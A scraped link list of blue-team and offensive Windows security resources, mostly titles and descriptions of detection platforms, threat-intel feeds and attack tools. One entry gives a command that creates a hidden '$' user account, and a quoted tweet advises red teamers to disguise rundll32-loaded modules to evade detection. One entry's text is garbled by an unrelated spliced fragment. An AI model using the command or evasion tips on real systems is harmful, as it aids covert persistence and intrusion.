| EVTX-ATTACK-SAMPLES | 2,252 | almost 2 years ago | : Windows Events Attack Samples |
| Windows Advanced Audit Policy Map to Event IDs | |||
| takuan | 84 | over 3 years ago | is a system service that parses logs and dectects noisy attackers in order to build a blacklist database of known cyber offenders., |
| CobaltStrikeScan | 900 | over 3 years ago | : Scan files or process memory for CobaltStrike beacons and parse their configuration |
| Hunting and detecting Cobalt Strike | |||
| Cobalt Strike Beacon Analysis | . python decoder: | ||
| How to Design Detection Logic - Part 1 | |||
| MitigatingPass-the-Hashand OtherCredential Theft | |||
| Evilginx-ing into the cloud: How we detected a red team attack in AWS | |||
| Hidden Shares as bait | |||
| Blue Team 201: Detection | — Where Do You Start? | ||
| The DML model | |||
| Data Sources, Containers, Cloud, and More: What’s New in ATT&CK v9? | |||
| hashlookup CIRCL API | |||
| BaselineTraining | 12 | over 5 years ago | : Notes from my "Implementing a Kick-Butt Training Program: Blue Team GO!" talk |
| Practical Training for Blue Teamers | |||
| BLUE TEAM LABS ONLINE | |||
| Defining Cobalt Strike Components So You Can BEA-CONfident in Your Analysis | |||
| There are a lot of ways that folks distinguish between blue team roles. My focus is on investigative work and cognitive skills, so I divide those roles into the mental model shown in this diagram. | |||
CSIRT / Blue Team / Threat Hunting | |||
| Wireshark For Network Threat Hunting: Creating Filters - Active Countermeasures | |||
| Comprehensive Threat Intelligence | Talos Blog || Cisco Talos Intelligence Group - : Adwind Dodges AV via DDE | ||
| strelka | 882 | about 1 month ago | : Scanning files at scale with Python and ZeroMQ |
| Threat-Hunting | 255 | almost 6 years ago | : Personal compilation of APT malware from whitepaper releases, documents and own research |
| ThreatHunter-Playbook | 4,030 | 9 months ago | : A Threat hunter's playbook to aid the development of techniques and hypothesis for hunting campaigns |
| HELK | : The Hunting ELK or simply the HELK is one of the first open source hunt platforms with advanced analytics capabilities such as SQL declarative language, graphing, structured streaming, and even machine learning via Jupyter notebooks and Apache Spark over an ELK stack | ||
| mordor | 1,605 | 8 months ago | : Re-play Adversarial Techniques |
| ioc_writer | 200 | over 1 year ago | : Provide a python library that allows for basic creation and editing of OpenIOC objects |
| 3 of the main observed false positive ive learned while hunting for cmd.exe as a child proc of rundll32.exe (still one of the top 3 pref host for backdoors implemented as dll or alike) #threathunting (understanding this kind of FPs is as important as learning new/old TTPs traces) | . For #redteam u can blend in with mimicking case1 by naming ur module something like MSI*.tmp and using similar export fct name (dll path usually under c:\users* so no high priv needed) | ||
| thethe | : Simple, shareable, team-focused and expandable threat hunting environment | ||
CSIRT / Blue Team / Threat Hunting / Mordor PCAPs 📡: | |||
| Capturing Network Packets from Windows Endpoints with Network Shell (Netsh) ⚔️ and Azure Network Watcher 🌩 | Part 1: | ||
CSIRT / Blue Team / Threat Hunting | |||
| cyber-threat-response-clinic | 4 | 6 days ago | |
| opencti | : | ||
| securityonion | 3,293 | 4 days ago | : Security Onion 2.0 (Pre-release) - Linux distro for threat hunting, enterprise security monitoring, and log management |
| TheHive | 3,446 | almost 2 years ago | : a Scalable, Open Source and Free Security Incident Response Platform |
| TheHive4py | 218 | 11 days ago | : Python API Client for TheHive |
| TheHiveIRPlaybook | 12 | over 4 years ago | is a collection of TheHive case templates used for Incident Response |
| Cortex-Analyzers | 434 | 14 days ago | : Cortex Analyzers Repository |
| Nimbus Network | Traffic Analyzer Augmented with our world-class threat intelligence | ||
| ja3 | 2,775 | about 1 year ago | is a standard for creating SSL client fingerprints in an easy to produce and shareable way |
| Threat Hunting Process | 5 | over 4 years ago | |
| Threat Hunting Princiĺes | 372 | almost 2 years ago | |
| TypeDB CTI | 145 | about 1 year ago | : |
| API-To-Event | 75 | about 5 years ago | Some repos from hunters-forge: , , |
| Yeti | 1,745 | 7 days ago | : |
| Watcher | 862 | 15 days ago | : Open Source Cybersecurity Threat Hunting Platform. Developed with Django & React JS |
CSIRT / Blue Team / Threat Hunting / Network Analysys: | |||
| traffic-analysis-workshop | 78 | about 3 years ago | and |
| Wireshark Tutorial: Exporting Objects from a Pcap | |||
| Hex Packet Decoder | : Hex Packet Decoder provides an for you to parse network packets | ||
| Packetor | : Packetor is an online hex-dump packet analyzer / decoder | ||
| Termshark | : , inspired by Wireshark | ||
| Wireshark Tutorial: Wireshark Workshop Videos Now Available | |||
| Wireshark Tutorial: Decrypting HTTPS Traffic | |||
CSIRT / Blue Team / Threat Hunting | |||
| Lookup Before You Go-Go...Hunting | |||
| Insider Threat Hunting | and | ||
| Wazuh | : is a free, open source and enterprise-ready security monitoring solution for threat detection, integrity monitoring, incident response and compliance. and | ||
| Hunting the Hunters - RCE in Covenant C2 | |||
| Passive SSH | : Passive SSH is an open source framework composed of a scanner and server to store and lookup the SSH keys and fingerprints per host (IPv4/IPv6/onion). repo: | ||
| EVTX-ATTACK-SAMPLES | 2,252 | almost 2 years ago | : Windows Events Attack Samples |
| Cyber Threat Intelligence | |||
| Cloud Threat Hunting: Attack & Investigation Series- Lateral Movement – Under the Radar | |||
| D4 core | 43 | 11 months ago | : D4 core software (server and sample sensor client) |
| A Top 10 Reading List if You’re Getting Started in Cyber Threat Intelligence | |||
| CTI SquadGoals | — Setting Requirements | ||
| Threat Intelligence Naming Conventions: Threat Actors, & Other Ways of Tracking Threats | |||
| BeaconEye | 885 | 3 months ago | : Hunts out CobaltStrike beacons and logs operator command output |
| Datafeeds/API | SANS DShiled | ||
| The State of Threat Hunting and the Role of the Analyst | |||
| Deepfence ThreatMapper | 4,845 | about 4 hours ago | : Identify vulnerabilities in running containers, images, hosts and repositories |
| SQUIRRELWAFFLE Leverages malspam to deliver Qakbot, Cobalt Strike | |||
| All Access Pass: Five Trends with Initial Access Brokers | |||
| Paint it, Blue - Transitionin from CTI to HUNT | 13 | over 1 year ago | : Ekoparty's BlueSpace Keynote November 2021. Shoutout to @plugxor Muchas Gracias!!! |
| Interesting large and small malspam attachments from 2023 | |||
| MISP (core software) | 5,387 | 6 days ago | Open Source Threat Intelligence Platform (formely known as Malware Information Sharing Platform) |
| MISP galaxy | 531 | 7 days ago | : Clusters and elements to attach to MISP events or attributes (like threat actors) |
| DigitalSide Threat-Intel | 148 | about 1 month ago | : Threat-Intel repository |
| MISP-sizer | 11 | over 6 years ago | : Sizing your MISP instance |
| MISP RPM | 34 | about 1 month ago | : RPM packages for MISP |
| ansible MISP | 52 | 11 days ago | : ansible role to setup MISP, Malware Information Sharing Platform & Threat Sharing |
| MISP CERT.br | |||
| misp-warninglist | 532 | 11 days ago | : Warning lists to inform users of MISP about potential false-positives or other information in indicators |
| MISP-maltego | 170 | 5 months ago | : Set of Maltego transforms to inferface with a MISP Threat Sharing instance, and also to explore the whole MITRE ATT&CK dataset |
| misp-modules | 345 | 4 days ago | : Modules for expansion services, import and export in MISP |
| misp-taxonomies | 264 | 4 days ago | : Taxonomies used in MISP taxonomy system and can be used by other information sharing tool |
| PyMISP | 445 | 7 days ago | : Python library using the MISP Rest API |
| MISP Concepts Cheat sheet | |||
| CyCAT.org API services | 30 | almost 2 years ago | : API back-end server including crawlers |
| teslacoil.py | : Monitors some log files and send new entries to syslog | ||
CSIRT / Blue Team / Threat Hunting / Tutorials: | |||
| MISP Training - Youtube CIRCL | |||
| Youtube CIRCL | |||
| PyMISP and MISP Objects: a door to new opportunities | |||
| Additional MISP training materials (including slides, documentation and videos | 389 | about 1 month ago | |
| Additional MISP training materials for law-enforcement agencies | 31 | about 1 year ago | |
CSIRT / Blue Team / Threat Hunting | |||
| More than a Dozen Obfuscated APT33 Botnets Used for Extreme Narrow Targeting | APT33: . . | ||
| Dismantling a fileless campaign: Microsoft Defender ATP’s Antivirus exposes Astaroth attack | |||
| Adversary Reports | : The latest whitepapers, solution briefs, and datasheets from Dragos | ||
| APT29 targets COVID-19 vaccine development | |||
| What is APT28's Drovorub Malware? | |||
| Dispatches from Drovorub: Network Threat Hunting for Russia GRU GTsSS' Malware at Scale | |||
| Tracking A Malware Campaign Through VT | |||
| More Evidence of APT Hackers-for-Hire Used for Industrial Espionage | |||
| US Charges Five Alleged Members of APT41 Group | APT41: | ||
| Analysis Report (AR20-268A) | |||
| Cyber Planning for Response and Recovery Study | CYPRESS - 2020 FERC, NERC and REs Report | ||
| TA505 | CHIMBORAZO | ||
| A Threat Actor Encyclopedia | Threat Group Cards: | ||
| Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor | . , symantec: . SunBurst_DGA_Decode | ||
| SolarWinds Security Advisory | |||
| If you work in a SOC, print out this screenshot & pin it to a wall in your office | |||
| Customer Guidance on Recent Nation-State Cyber Attacks | |||
| Mapping out AridViper Infrastructure Using Augury’s Malware Module | |||
| The Story of Jian | : How APT31 Stole and Used an Unknown Equation Group 0-Day | ||
| APT Encounters of the Third Kind | |||
| Lazarus APT conceals malicious code within BMP image to drop its RAT | found new | ||
| distribute malicious zip with lnk? MSHTA > wscript > new LNK in startup > Reboot > MSHTA > wscript. | |||
| Analysis of the Iranian cyber attack landscape | |||
| Lemon Duck spreads its wings | : Actors target Microsoft Exchange servers, incorporate new TTPs | ||
| threat actortouching an endpoint | |||
| China’s PLA Unit 61419 Purchasing Foreign Antivirus Products, Likely for Exploitation | |||
| APTnotes | 1,658 | 4 months ago | is a repository of publicly-available papers and blogs (sorted by year) related to malicious campaigns/activity/software that have been associated with vendor-defined APT (Advanced Persistent Threat) groups and/or tool-sets |
| The Active Adversary Playbook 2021 | : Attacker behaviors, tactics, techniques and procedures (TTPs) | ||
| An Update on Industrialize the Tracking of Botnet Operations | |||
| Patchwork APT caught in its own web | |||
| Armagedon/Gamaredon | |||
| North Korea’s Lazarus APT leverages Windows Update client, GitHub in latest campaign | |||
| Update on cyber activity in Eastern Europe | |||
| Cisco Talos shares insights related to recent cyber attack on Cisco | |||
| Operation Triangulation: The last (hardware) mystery | |||
CSIRT / Blue Team / IoCs | |||
| sophos labs IoCs | 545 | 17 days ago | : Sophos-originated indicators-of-compromise from published |
| DailyIOC | 310 | 12 months ago | : IOC from articles, tweets for archives |
| CVE-2020-1472 Zerologon IoCs | |||
| iocs | 702 | about 1 month ago | : Indicators from Unit 42 Public Reports |
| Threat intelligence and threat detections | 53 | almost 4 years ago | : Threat intelligence and threat detection indicators (IOC, IOA) |
| APT_Digital_Weapon | 896 | 3 months ago | : Indicators of compromise (IOCs) collected from public resources and categorized by Qi-AnXin |
| Ryuk Speed Run, 2 Hours to Ransom | |||
| What did DeathStalker hide between two ferns? | |||
| Yikes, Microsoft have signed multiple rootkits (which allow kernel drivers) and reach out to a remote IP | |||
| Netfilter Rootkit Samples | |||
| Feodo Tracker | tracks certain families that are related or that evolved from Feodo | ||
| There are evil packages on the npm registry that deploy XMRIG | |||
| Emotet 2022 | epoch4 | 22.04.2022 | | 55 | over 1 year ago | |
| 238 Cobalt Strike stage 2 IP's, with 238 unique configurations, identified today. | |||
| malware-IoC | 14 | about 1 year ago | : Bienvenidos al repositorio oficial de IoC del equipo de Cyber Threat intelligence de Entel Cyber Secure |
| IcedID | 31.08.2022 | Campaign 2786525712 | 34 | 12 months ago | |
CSIRT / Blue Team / SIEM | |||
| Sigma | 8,371 | 8 days ago | : Generic Signature Format for SIEM Systems |
CSIRT / Blue Team / SIEM / Sigma | |||
| Suspicious Use of Procdump | 8,371 | 8 days ago | : Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable |
| KrbRelayUp local privilege escalation. | 115 | 2 months ago | |
CSIRT / Blue Team / SIEM | |||
| Events Heatmap | |||
| RedELK | 2,383 | 2 months ago | : Red Team's SIEM - easy deployable tool for Red Teams used for tracking and alarming about Blue Team activities as well as better usability in long term operations |
| plaso | 1,734 | about 1 month ago | : Super timeline all the things |
| Heatmaps Make Ops Better | |||
| graylog-guide-snort | 27 | about 1 year ago | : How to send structured Snort IDS alert logs into Graylog |
| TALR | 89 | almost 6 years ago | : Threat Alert Logic Repository |
| Auditing Continuously vs. Monitoring Continuously | |||
| Logsspot | : Logsspot is a project created to help cybersec folks understand what kind of information a security technology can present and how to use to improve detection and intelligence | ||
| Corsair | 7 | over 5 years ago | : Python wrapper for some NSOC tools. Corsair aims to implement RESTFul wrappers for different tools commonly used by Network and Security Operations Centers (NSOC) |
| Scalable Logging and Tracking | |||
| Logs were our lifeblood. Now they're our liability. | |||
| Using Flume to Collect Apache 2 Web Server Logs | |||
| spectx | : Instantly parse and investigate raw log files | ||
| The log/event processing pipeline you can't have | |||
| Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance | |||
| Here's a Splunk way to score behaviors that are derived from detections | |||
| ProductLoggingTracker | 7 | almost 5 years ago | : Simple list of product types that InfoSec professionals may want to collect into a central repository |
| The Log Pile | : scripts to help witch log to save | ||
| Part of my role is ensuring we're not EDR-centric. We have to be able to detect threats w/o OS-level viz (e.g., control plane only), using auth/net events, or whatever data is in a SIEM | |||
| LORG | 209 | almost 6 years ago | : Apache Logfile Security Analyzer |
| Shipping to Elasticsearch Microsoft DNS Logs | |||
| Windows 10 ETW Events | 267 | 7 months ago | : Events from all manifest-based and mof-based ETW providers across Windows 10 versions |
| Log Parser Lizard | : provides a modern graphical user interface to Microsoft Log Parser 2.2 for analyzing logs using SQL queries | ||
| Fluentd | 12,912 | 11 days ago | : Unified Logging Layer (project under CNCF) |
| Laurel | 711 | 23 days ago | : Transform Linux Audit logs for SIEM usage |
| Matano | 1,474 | 4 months ago | : The open-source |
CSIRT / Browsers | |||
| SOK: On the Analysis of Web Browser Security | |||
| Bypassing Browser Security Warnings with Pseudo Password Fields | |||
| New Cache ATtacks on TLS Implementations | The 9 Lives of Bleichenbacher's CAT: | ||
| How To Blow Your Online Cover With URL Previews | |||
| Nefarious LinkedIn | : A look at how LinkedIn exfiltrates extension data from your browser | ||
| Lightnion | 119 | about 4 years ago | : A light version of Tor portable to the browser |
| Puppeteer | 88,848 | 8 days ago | : Headless Chrome Node API |
| uBlock Origin | 47,504 | 6 days ago | : An efficient blocker for Chromium and Firefox. Fast and lean |
| autochrome | 446 | 8 months ago | : This tool downloads, installs, and configures a shiny new copy of Chromium |
| BROWSERGAP | :Browse Anything Securely, Browse the web without the web browsing you | ||
| browsergap.ce | 3,454 | 13 days ago | : Simple Isolated Remote Browsers, Open Source |
| Crash Chrome | |||
| Firefox: How a website could steal all your cookies | |||
| Online Trackers Increasingly Switching to Invasive CNAME Cloaking Technique | |||
CSIRT / Browsers / Browsers Addons | |||
| Addons for Firefox | : | ||
| LinkGopher | |||
| (Image) WebDeveloper | |||
| (Image) IPvFoo | |||
| DownthemAll | |||
| SixorNot | |||
| Uppity | |||
| Cliget | |||
| (Image) URLs List | |||
| Link Redirect Trace | |||
| Tamper Data for FF Quantum | |||
| BuiltWith | |||
| Wappalyzer | |||
| Exif Viewer | |||
| Anti-Grabify Browser Extension | 64 | 8 months ago | |
CSIRT / Operating Systems | |||
| bochspwn-reloaded | 297 | over 5 years ago | : A Bochs-based instrumentation performing kernel memory taint tracking to detect disclosure of uninitialized memory to ring 3 |
| drltrace | 389 | over 4 years ago | : Drltrace is a library calls tracer for Windows and Linux applications |
| shellz | 569 | 4 months ago | : is a small utility to track and control your ssh, telnet, web and custom shells |
| CLIP OS | : Open Source secured operating system by Agence nationale de la sécurité des systèmes d'information | ||
| How to Get Started With VMware vSphere Security « vMiss.net | |||
| routeros | 866 | almost 2 years ago | : RouterOS Bug Hunt Materials Presented at Derbycon 2018 |
| Awesome-Study-Resources-for-Kernel-Hacking | 106 | over 8 years ago | : Kernel Hacking study materials collection |
| Skadi | 491 | about 2 years ago | : Collect, Process, and Hunt with host based data from MacOS, Windows, and Linux |
| taintgrind | 249 | about 1 year ago | :A taint-tracking plugin for the Valgrind memory checking tool |
| UPX | is a free, portable, extendable, high-performance executable packer for several executable formats | ||
CSIRT / Operating Systems / Mainframe: | |||
| MF Sniffer | 47 | over 1 year ago | : Mainframe TN3270 unencrypted TSO session user ID and password sniffer |
CSIRT / Operating Systems | |||
| magic-trace | 4,658 | about 1 month ago | : collects and displays high-resolution traces of what a process is doing |
CSIRT / Operating Systems / UEFI | |||
| uefi-jitfuck | 85 | over 6 years ago | : A JIT compiler for Brainfuck running on x86_64 UEFI |
| Secure Boot in the Era of the T2 | : Continuing our series on Apple’s new T2 platform and examining the role it plays in Apple’s vision of Secure Boot | ||
| PSPTool | 611 | 2 months ago | : Display, extract, and manipulate PSP firmware inside UEFI images |
| Project Mu | : is a modular adaptation of TianoCore's edk2 tuned for building modern devices using a scalable, maintainable, and reusable pattern | ||
| Force firmware code to be measured and attested by Secure Launch on Windows 10 | |||
CSIRT / Operating Systems / Windows | |||
| Awesome Advanced Windows Exploitation References | 1,457 | almost 3 years ago | |
| windows kernel security development | 1,957 | about 2 years ago | |
| A process scanner detecting and dumping hollowed PE modules. | 2,036 | 17 days ago | |
| dll_to_exe | 794 | over 1 year ago | : Converts a DLL into EXE |
| pe-sieve | 3,103 | 17 days ago | : Scans a given process. Recognizes and dumps a variety of potentially malicious implants (replaced/injected PEs, shellcodes, hooks, in-memory patches) |
| A PowerShell utility to dynamically uncover a DCShadow attack | |||
| MSRC | 1,324 | 4 months ago | Security Research from the Microsoft Security Response Center ( ) |
| DCSYNCMonitor | 138 | over 6 years ago | |
| Total Meltdown? | |||
| DetectionLab | 4,649 | 5 months ago | : Vagrant & Packer scripts to build a lab environment complete with security tooling and logging best practices. Post |
| powerlessshell | 1,474 | over 1 year ago | : Run PowerShell command without invoking powershell.exe |
| internal-monologue | 1,401 | about 6 years ago | : Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS |
| Robber | 765 | over 2 years ago | is open source tool for finding executables prone to DLL hijacking |
| Remote-Desktop-Caching | 208 | over 6 years ago | |
| LogRM | 73 | over 5 years ago | : LogRM is a post exploitation powershell script which it uses windows event logs to gather information abou |
| InvisiblePersistence | 338 | over 6 years ago | : Persisting in the Windows registry "invisibly" |
| Dynamic Tracing in Windows 10 19H1 | |||
| Capturing NetNTLM Hashes with Office [DOT] XML Documents | |||
| LoL Malware Meets Python-Based Command and Control (C2) Server, Part I | |||
| Passing-the-Hash to NTLM Authenticated Web Applications | |||
| Detours | 5,270 | about 1 month ago | : Detours is a software package for monitoring and instrumenting API calls on Windows. It is distributed in source code form |
| r0ak | 28 | about 6 years ago | : r0ak ("roak") is the Ring 0 Army Knife -- A Command Line Utility To Read/Write/Execute Ring Zero on for Windows 10 Systems |
| SpeculationControl | 130 | over 1 year ago | : SpeculationControl is a PowerShell script that summarizes the state of configurable Windows mitigations for various speculative execution side channel vulnerabilities, such as CVE-2017-5715 (Spectre variant 2) and CVE-2017-5754 (Meltdown) |
| Reverse Engineering Windows Defender (by Alexei Bulazel): and | |||
CSIRT / Operating Systems / Windows / pdf | |||
| XOR encryption – Windows x64 | Ground Zero: Part 2-2 | ||
| Building Cracked Binaries – Windows x64 | Ground Zero: Part 2-3 | ||
CSIRT / Operating Systems / Windows | |||
| EKFiddle | 636 | 5 days ago | : A framework based on the Fiddler web debugger to study Exploit Kits, malvertising and malicious traffic in general |
| Windows Command-Line | : Introducing the Windows Pseudo Console (ConPTY) – Windows Command Line Tools For Developers | ||
| MSconsole | 95,774 | 6 days ago | : Windows Console Tools |
| PowerShell Remoting | by Stephanos Constantinou Blog | ||
| DbgShell | 675 | 8 months ago | : A PowerShell front-end for the Windows debugger engine |
| Windows Incident Response: Updates | |||
| Win 10 related research | 178 | 11 months ago | |
CSIRT / Operating Systems / Windows / Win 10 related research | |||
| Event log 'Keywords' p1 | 178 | 11 months ago | |
| Windows 10 - Notifications | 178 | 11 months ago | |
CSIRT / Operating Systems / Windows | |||
| UAC bypass using CreateNewLink COM interface | |||
CSIRT / Operating Systems / Windows / Privilege Escalation: | |||
| Windows Privilege Escalation (Unquoted Path Service) | |||
| WinPwnage | 2,622 | almost 2 years ago | : Elevate, UAC bypass, privilege escalation, dll hijack techniques |
| Securing SCOM in a Privilege Tiered Access Model | –Part 1 | ||
| Windows Privilege Escalation Guide | : This guide is influenced by g0tm1lk’s Basic Linux Privilege Escalation, which at some point you should have already seen and used. I wanted to try to mirror his guide, except for Windows. So this guide will mostly focus on the enumeration aspect | ||
| An introduction to privileged file operation abuse on Windows | : This is a (bit long) introduction on how to abuse file operations performed by privileged processes on Windows for local privilege escalation (user to admin/system), and a presentation of available techniques, tools and procedures to exploit these types of bugs | ||
| Control Flow Guard Teleportation | : The idea that I tried in 2018 was to use Control Flow Guard (CFG) to regenerate my code in a special memory region. CFG is a security feature that aims to mitigate the redirection of the execution flow, for example, by checking if the target address for an indirect call is valid function. [demo](https:/The purpose of this application is to analyze and create statistics of repetitive lock patterns that everyday users create and use.nprivileged window could just send commands to a highly privileged window, and that’s what UIPI, User Interface Privilege Isolation, prevents. This isn’t a story about UIPI, but it is how it began. - Interactive CTF Exploration Tool | ||
| PsExec Local Privilege Escalation | |||
| SweetPotato | 1,622 | 3 months ago | : Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019 |
| Windows Exploit Suggester - Next Generation (WES-NG) | 4,226 | 11 days ago | |
| Windows Local Privilege Escalation Cookbook | 981 | 8 months ago | |
CSIRT / Operating Systems / Windows | |||
| Remote NTLM relaying through meterpreter on Windows port 445 | , : A TCP packet diverter for Windows platform | ||
| Analyzing obfuscated powershell with shellcode | , | ||
| Empire 4.2 was just finalized over the weekend and we are excited to share some of the new features. | |||
| relayer | 148 | almost 6 years ago | : SMB Relay Attack Script |
| Ps1jacker | 61 | about 6 years ago | : Ps1jacker is a tool for generating COM Hijacking payload |
| python-dotnet-binaryformat | 49 | about 6 years ago | : Pure Python parser for data encoded by .NET's BinaryFormatter |
| Firework | 44 | over 4 years ago | : Firework is a proof of concept tool to interact with Microsoft Workplaces creating valid files required for the provisioning process |
| hUACME | 6,377 | 4 months ago | : Defeating Windows User Account Control |
| SysmonTools | 1,488 | 6 months ago | : Utilities for Sysmon |
| sysmon-config | 4,810 | 5 months ago | : Sysmon configuration file template with default high-quality event tracing |
| Sysmon: how to set up, update and use? | |||
| Panache_Sysmon | : Just another sysmon config | ||
| Hiding malware in Windows | – The basics of code injection | ||
| Inveigh | 2,555 | 4 months ago | : Windows PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer/man-in-the-middle tool |
| Bypassing AppLocker Custom Rules | : 0x09AL Security blog | ||
| SpecuCheck | 569 | about 5 years ago | : SpecuCheck is a Windows utility for checking the state of the software mitigations against CVE-2017-5754 (Meltdown) and hardware mitigations against CVE-2017-5715 (Spectre) |
| RID-Hijacking | 165 | about 2 years ago | : Windows RID Hijacking persistence technique |
| WSL Reloaded | |||
| Windows oneliners to download remote payload and execute arbitrary code | |||
| reflectivepotato | : MSFRottenPotato built as a Reflective DLL. Work in progress | ||
| randomrepo | 0 | 10 months ago | : Repo for random stuff |
| Microsoft Windows win32k.sys | : Invalid Pointer Vulnerability (MSRC Case 48212) - Security Research | ||
| rdpy | 1,690 | over 3 years ago | : Remote Desktop Protocol in Twisted Python |
| SharpWeb | 510 | almost 6 years ago | : NET 2.0 CLR project to retrieve saved browser credentials from Google Chrome, Mozilla Firefox and Microsoft Internet Explorer/Edge |
| reconerator | 121 | almost 4 years ago | : C# Targeted Attack Reconnissance Tools |
| ManbagedInjection | 162 | over 6 years ago | : A proof of concept for dynamically loading .net assemblies at runtime with only a minimal convention pre-knowledge |
| InveighZero | 791 | about 2 years ago | : C# LLMNR/NBNS spoofer |
| DanderSpritz Lab | 419 | over 5 years ago | : A fully functional lab in 2 commands |
| Lateral movement using URL Protocol | |||
| HiddenPowerShell | 93 | about 6 years ago | : This project was created to explore the various evasion techniques involving PowerShell: Amsi, ScriptBlockLogging, Constrained Language Mode and AppLocker |
| One Windows Kernel | |||
| The Dog Whisperer’s Handbook | : This PDF is a collection of bits and pieces that were scattered across the web and that I collected in the last two years while writing the CypherDog PowerShell module | ||
| Attack and Defend microsoft enhanced security administrative environment | |||
| raw-socket-snifferr | 180 | about 6 years ago | : Packet capture on Windows without a kernel drive |
| DCOMrade | 254 | almost 6 years ago | : Powershell script for enumerating vulnerable DCOM Applications |
| shed | 268 | almost 6 years ago | : .NET runtime inspector |
| Recovering Plaintext Domain Credentials from WPA2 Enterprise on a Compromised Host | |||
| How to steal NTLMv2 hashes using file download vulnerability in web application | |||
| NTLMRelay2Self | 394 | 10 months ago | : An other No-Fix LPE, NTLMRelay2Self over HTTP (Webdav) |
| Simpleator | 335 | almost 6 years ago | : ("Simple-ator") is an innovative Windows-centric x64 user-mode application emulator that lever |
| WinDbg-Samples | 722 | 3 months ago | : Sample extensions, scripts, and API uses for WinDbg |
| OrgKit | 597 | 3 months ago | : Provision a brand-new company with proper defaults in Windows, Offic365, and Azure |
| Leveraging WSUS | |||
| windowsblindread | 199 | over 1 year ago | : A list of files / paths to probe when arbitrary files can be read on a Microsoft Windows operating system |
| azucar | 563 | about 2 years ago | : Security auditing tool for Azure environments |
| volatility-wnf | 15 | almost 6 years ago | : Browse and dump Windows Notification Facilities |
| Yet another sdclt UAC bypass | : As often with UAC, the flaw comes from an auto-elevated process. These processes have the particularity to run with high integrity level without prompting the local admin with the usual UAC window | ||
| awesome-windows-kernel-security-development | 1,957 | about 2 years ago | : windows kernel security development |
| ALPC-BypassUAC | 155 | over 5 years ago | : UAC Bypass with mmc via alpc |
| ManagedPasswordFilter | 45 | over 5 years ago | : Windows Password Filter that uses managed code internally |
| DeviceGuardBypasses | 133 | over 7 years ago | : A repository of some of my Windows 10 Device Guard Bypasses |
| rifiuti2 | 144 | 7 months ago | : Windows Recycle Bin analyser |
| Reversing and Patching .NET Binaries with Embedded References | |||
| Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript | |||
| Windows PowerShell Remoting | : Host Based Investigation and Containment Techniques | ||
| .NET Manifesto | : win friends and influence the loader. . from | ||
| Bypassing Windows User Account Control | |||
| symboliclink-testing-tools | 758 | almost 2 years ago | : This is a small suite of tools to test various symbolic link types of Windows |
| Run PowerShell without Powershell.exe | — Best tools & techniques | ||
| Bypassing the Microsoft-Windows-Threat-Intelligence Kernel APC Injection Sensor | |||
| Privileged Access Workstations | |||
| Activation Contexts | — A Love Story. Windows loads a version of the Microsoft.Windows.SystemCompatible assembly manifest into every process. Tampering with it lets you inject DLL side-loading opportunities into every process, and to perform COM hijacking without touching the registry. Unfortunately, the manifest could be replaced by another version, possibly killing your persistence by surprise | ||
| Evil-WinRM | 4,537 | 25 days ago | : The ultimate WinRM shell for hacking/pentesting |
| Understanding WdBoot (Windows Defender ELAM) | |||
| SharpHide | 465 | about 5 years ago | : Tool to create hidden registry keys |
| Microsoft Finally Releases Guidance and a Script to Change the KRBTGT Account | |||
| Deploying honeytokens in Active Directory & How to trick attackers with deceptive BloodHound paths | |||
| CrackMapExec | module to set as "owned" on BloodHound every target owned by the attacker | ||
| Configuring Additional LSA Protection | |||
| Getting Malicious Office Documents to Fire with Protected View Enable | |||
CSIRT / Operating Systems / Windows / The Internals of AppLocker: | |||
| Overview and Setup | Part 1: | ||
| Blocking Process Creation | Part 2: | ||
| Access Tokens and Access Checking | Part 3: | ||
| Blocking DLL Loading | Part 4: | ||
CSIRT / Operating Systems / Windows | |||
| COM-Code-Helper | 178 | about 4 years ago | : Two IDAPython Scripts help you to reconstruct Microsoft COM (Component Object Model) Code |
| Scylla | 1,116 | over 1 year ago | : Imports Reconstructor |
| A Speed-Research on Windows Explorer's Auto-Completion | |||
| sysmon-config | 4,810 | 5 months ago | : A Sysmon configuration file for everybody to fork |
| Windows Event Forwarding Guidance | 1,228 | 4 months ago | |
| Build a fast, free, and effective Threat Hunting/Incident Response Console with Windows Event Forwarding and PowerBI | |||
| Microsoft Defender Advanced Threat Protection (ATP) | |||
| BeaKer | 286 | about 2 months ago | Beaconing Kibana Executable Report: Aggregates Sysmon Network Events With Elasticsearch and Kibana |
| python-ntlm | 90 | over 2 years ago | : Automatically exported from code.google.com/p/python-ntlm |
| Logging Made Easy | 706 | about 1 year ago | : is a self-install tutorial for small organisations to gain a basic level of centralised security logging for Windows clients and provide functionality to detect attacks |
| lme | 706 | about 1 year ago | : Logging Made Easy, is a self-install tutorial for small organisations to gain a basic level of centralised security logging for Windows clients and provide functionality to detect attacks |
| SharePoint and Pwn | :: Remote Code Execution Against SharePoint Server Abusing DataSet | ||
| Secure DevOps Kit for Azure | 497 | almost 3 years ago | (AzSK) |
| Windows Debugger API — The End of Versioned Structures | |||
| DisableAntiSpyware | |||
| Have you ever wondered what happens behind the scenes when you type your password into the Windows logon screen and hit enter? | |||
| DefendTheFlag | 234 | over 4 years ago | : Get started fast with a built out lab, built from scratch via Azure Resource Manager (ARM) and Desired State Configuration (DSC), to test out Microsoft's security products |
| DumpReparsePoints | 31 | over 4 years ago | : This is a simple tool to dump all the reparse points on an NTFS volume |
| Certify SSL Manager | : manage free https certificates for IIS | ||
| Bypassing Credential Guard | : Wdigest can be enabled on a system with Credential Guard by patching the values of g_fParameter_useLogonCredential and g_IsCredGuardEnabled in memory | ||
| WSUS Attacks Part 1: Introducing PyWSUS | |||
| This is about adding a $ account and have it not show up in net users. | : net user $ LetMeIn123! /add /active:yes | ||
| LECmd | 277 | 5 months ago | : Lnk Explorer Command line edition!! |
| PECmd | 223 | 2 months ago | : Prefetch Explorer Command Line |
| Five PE Analysis Tools Worth Looking At | |||
CSIRT / Operating Systems / Windows / Five PE Analysis Tools Worth Looking At | |||
| pestudio | : The goal of pestudio is to spot suspicious artifacts within executable files in order to ease and accelerate Malware Initial Assessment and is used by Computer Emergency Response Teams and Labs worldwide | ||
| PEview version | |||
| FileAlyzer | |||
| NTCore | Explorer Suite | ||
| exeinfo | |||
CSIRT / Operating Systems / Windows | |||
